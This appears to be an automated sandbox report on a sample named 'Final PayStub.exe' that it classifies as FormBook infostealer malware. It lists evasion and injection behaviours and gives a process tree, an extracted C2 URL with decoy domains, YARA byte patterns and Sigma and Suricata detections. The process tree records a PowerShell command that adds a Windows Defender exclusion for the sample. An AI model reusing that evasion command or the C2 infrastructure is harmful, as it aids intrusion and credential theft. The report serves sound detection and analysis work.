Edit tour

Windows Analysis Report
Final PayStub.exe

Overview

General Information

Sample name:	Final PayStub.exe
Analysis ID:	1633486
MD5:	7fb8134ee407aacb994486a243aac1fe
SHA1:	20b663470d34c18e32e84570e7138ebe34397810
SHA256:	c68fd2199806868970ba64af5626f4004bd075441b3f8a902153570950689dd1
Tags:	exeuser-adrian__luca
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected FormBook

.NET source code contains potential unpacker

Adds a directory exclusion to Windows Defender

C2 URLs / IPs found in malware configuration

Found direct / indirect Syscall (likely to bypass EDR)

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Switches to a custom stack to bypass stack traces

Tries to detect virtualization through RDTSC time measurements

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found decision node followed by non-executed suspicious APIs

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

Final PayStub.exe (PID: 6720 cmdline: "C:\Users\user\Desktop\Final PayStub.exe" MD5: 7FB8134EE407AACB994486A243AAC1FE)

powershell.exe (PID: 7008 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Final PayStub.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Final PayStub.exe (PID: 7040 cmdline: "C:\Users\user\Desktop\Final PayStub.exe" MD5: 7FB8134EE407AACB994486A243AAC1FE)

Final PayStub.exe (PID: 7024 cmdline: "C:\Users\user\Desktop\Final PayStub.exe" MD5: 7FB8134EE407AACB994486A243AAC1FE)

Final PayStub.exe (PID: 7004 cmdline: "C:\Users\user\Desktop\Final PayStub.exe" MD5: 7FB8134EE407AACB994486A243AAC1FE)

explorer.exe (PID: 496 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

autofmt.exe (PID: 6104 cmdline: "C:\Windows\SysWOW64\autofmt.exe" MD5: C72D80A976B7EB40534E8464957A979F)

systray.exe (PID: 6752 cmdline: "C:\Windows\SysWOW64\systray.exe" MD5: 28D565BB24D30E5E3DE8AFF6900AF098)

cmd.exe (PID: 7196 cmdline: /c del "C:\Users\user\Desktop\Final PayStub.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

svchost.exe (PID: 7040 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.oddsideodylicoopod.cloud/g43m/"], "decoy": ["657839.club", "4hz5biuup99147yw.xyz", "purrizon.life", "brotulabunionsburack.cloud", "flow20.club", "sityk.shop", "basesatoshi.xyz", "bdxhivua.icu", "bnmvchjfdskqwe.monster", "localorganicbd.xyz", "9bets.net", "biudy.autos", "mikelowe.net", "investing-courses-36092.bond", "bankersbasogabergamo.cloud", "gangmot.pro", "everythingnatural.shop", "semijepang.fun", "t90oq236d.shop", "advcash.financial", "aeigi.autos", "security-apps-66355.bond", "velvetwavez.shop", "insulate-attic-98951.bond", "ptpros.xyz", "yapimaster.xyz", "zyxir.autos", "evosystems.cloud", "iches888.asia", "7mwh-2ghmv.xyz", "ar-inc.net", "smartrbaskets.net", "xrmkh.autos", "personal-loans-49223.bond", "jcmds.autos", "shrinivas.shop", "vego789x.pro", "opaclw.info", "cleaning-services-18202.bond", "gazda.army", "blockchainbetting.xyz", "igmommymilk.xyz", "marko.events", "newtoday.news", "bgame777v.pro", "chocolate-packaging-jobs08.buzz", "storage-cabinets-47807.bond", "iyduvszv.group", "persoonlijke-lening-2.today", "truck-driver-jobs-60289.bond", "729709.bid", "work-abroad-72336.bond", "rivierafinancial.tech", "usaworldpageant.net", "sstrs.autos", "gtja885.xyz", "furniture-38563.bond", "oldfox.info", "quantaquiteveramnes.cloud", "truthverse.xyz", "pillow-48640.bond", "deafow.shop", "pixiesol.lol", "ct-ad.autos"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000D.00000002.2468663699.0000000003150000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000D.00000002.2468663699.0000000003150000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000D.00000002.2468663699.0000000003150000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cb90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000D.00000002.2468663699.0000000003150000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c8fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000D.00000002.2468663699.0000000003150000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18819:$sqlite3step: 68 34 1C 7B E1 0x1892c:$sqlite3step: 68 34 1C 7B E1 0x18848:$sqlite3text: 68 38 2A 90 C5 0x1896d:$sqlite3text: 68 38 2A 90 C5 0x1885b:$sqlite3blob: 68 53 D8 7F 8C 0x18983:$sqlite3blob: 68 53 D8 7F 8C
0000000D.00000002.2467525905.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000D.00000002.2467525905.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000D.00000002.2467525905.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cb90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000D.00000002.2467525905.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c8fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000D.00000002.2467525905.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18819:$sqlite3step: 68 34 1C 7B E1 0x1892c:$sqlite3step: 68 34 1C 7B E1 0x18848:$sqlite3text: 68 38 2A 90 C5 0x1896d:$sqlite3text: 68 38 2A 90 C5 0x1885b:$sqlite3blob: 68 53 D8 7F 8C 0x18983:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000002.1304138024.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000002.1304138024.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.1304138024.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cb90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000006.00000002.1304138024.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c8fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000002.1304138024.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18819:$sqlite3step: 68 34 1C 7B E1 0x1892c:$sqlite3step: 68 34 1C 7B E1 0x18848:$sqlite3text: 68 38 2A 90 C5 0x1896d:$sqlite3text: 68 38 2A 90 C5 0x1885b:$sqlite3blob: 68 53 D8 7F 8C 0x18983:$sqlite3blob: 68 53 D8 7F 8C
0000000D.00000002.2468573354.0000000003120000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000D.00000002.2468573354.0000000003120000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000D.00000002.2468573354.0000000003120000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cb90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000D.00000002.2468573354.0000000003120000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c8fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000D.00000002.2468573354.0000000003120000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18819:$sqlite3step: 68 34 1C 7B E1 0x1892c:$sqlite3step: 68 34 1C 7B E1 0x18848:$sqlite3text: 68 38 2A 90 C5 0x1896d:$sqlite3text: 68 38 2A 90 C5 0x1885b:$sqlite3blob: 68 53 D8 7F 8C 0x18983:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.1246427510.00000000037A9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.1246427510.00000000037A9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000002.1246427510.00000000037A9000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x81a61:$a1: 3C 30 50 4F 53 54 74 09 40 0xafe81:$a1: 3C 30 50 4F 53 54 74 09 40 0xdd2a1:$a1: 3C 30 50 4F 53 54 74 09 40 0x983a0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xc67c0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xf3be0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x861df:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0xb45ff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0xe1a1f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x910c7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0xbf4e7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0xec907:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000000.00000002.1246427510.00000000037A9000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85118:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x85392:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xb3538:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xb37b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xe0958:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xe0bd2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x90ec5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xbf2e5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xec705:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x909b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xbedd1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xec1f1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x90fc7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xbf3e7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xec807:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x9113f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xbf55f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xec97f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85daa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xb41ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xe15ea:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
00000000.00000002.1246427510.00000000037A9000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x94029:$sqlite3step: 68 34 1C 7B E1 0x9413c:$sqlite3step: 68 34 1C 7B E1 0xc2449:$sqlite3step: 68 34 1C 7B E1 0xc255c:$sqlite3step: 68 34 1C 7B E1 0xef869:$sqlite3step: 68 34 1C 7B E1 0xef97c:$sqlite3step: 68 34 1C 7B E1 0x94058:$sqlite3text: 68 38 2A 90 C5 0x9417d:$sqlite3text: 68 38 2A 90 C5 0xc2478:$sqlite3text: 68 38 2A 90 C5 0xc259d:$sqlite3text: 68 38 2A 90 C5 0xef898:$sqlite3text: 68 38 2A 90 C5 0xef9bd:$sqlite3text: 68 38 2A 90 C5 0x9406b:$sqlite3blob: 68 53 D8 7F 8C 0x94193:$sqlite3blob: 68 53 D8 7F 8C 0xc248b:$sqlite3blob: 68 53 D8 7F 8C 0xc25b3:$sqlite3blob: 68 53 D8 7F 8C 0xef8ab:$sqlite3blob: 68 53 D8 7F 8C 0xef9d3:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: Final PayStub.exe PID: 6720	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x19ea4:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: Final PayStub.exe PID: 7004	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x358:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: systray.exe PID: 6752	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x31612:$a1: 3C 30 50 4F 53 54 74 09 40 0x34964:$a1: 3C 30 50 4F 53 54 74 09 40 0xa41c3:$a1: 3C 30 50 4F 53 54 74 09 40
Click to see the 23 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
6.2.Final PayStub.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
6.2.Final PayStub.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
6.2.Final PayStub.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5451:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bd90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9bcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14ab7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
6.2.Final PayStub.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1aaf7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bafa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
6.2.Final PayStub.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a19:$sqlite3step: 68 34 1C 7B E1 0x17b2c:$sqlite3step: 68 34 1C 7B E1 0x17a48:$sqlite3text: 68 38 2A 90 C5 0x17b6d:$sqlite3text: 68 38 2A 90 C5 0x17a5b:$sqlite3blob: 68 53 D8 7F 8C 0x17b83:$sqlite3blob: 68 53 D8 7F 8C
6.2.Final PayStub.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
6.2.Final PayStub.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
6.2.Final PayStub.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cb90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
6.2.Final PayStub.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c8fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
6.2.Final PayStub.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18819:$sqlite3step: 68 34 1C 7B E1 0x1892c:$sqlite3step: 68 34 1C 7B E1 0x18848:$sqlite3text: 68 38 2A 90 C5 0x1896d:$sqlite3text: 68 38 2A 90 C5 0x1885b:$sqlite3blob: 68 53 D8 7F 8C 0x18983:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 5 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Final PayStub.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Final PayStub.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Final PayStub.exe", ParentImage: C:\Users\user\Desktop\Final PayStub.exe, ParentProcessId: 6720, ParentProcessName: Final PayStub.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Final PayStub.exe", ProcessId: 7008, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc, CommandLine: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Final PayStub.exe", ParentImage: C:\Users\user\Desktop\Final PayStub.exe, ParentProcessId: 6720, ParentProcessName: Final PayStub.exe, ProcessCommandLine: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc, ProcessId: 7040, ProcessName: svchost.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Final PayStub.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Final PayStub.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Final PayStub.exe", ParentImage: C:\Users\user\Desktop\Final PayStub.exe, ParentProcessId: 6720, ParentProcessName: Final PayStub.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Final PayStub.exe", ProcessId: 7008, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc, CommandLine: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Final PayStub.exe", ParentImage: C:\Users\user\Desktop\Final PayStub.exe, ParentProcessId: 6720, ParentProcessName: Final PayStub.exe, ProcessCommandLine: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc, ProcessId: 7040, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE FormBook CnC Checkin (GET)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-10T12:13:56.836476+0100	2031453	1	Malware Command and Control Activity Detected	192.168.2.6	49696	67.211.70.30	80	TCP
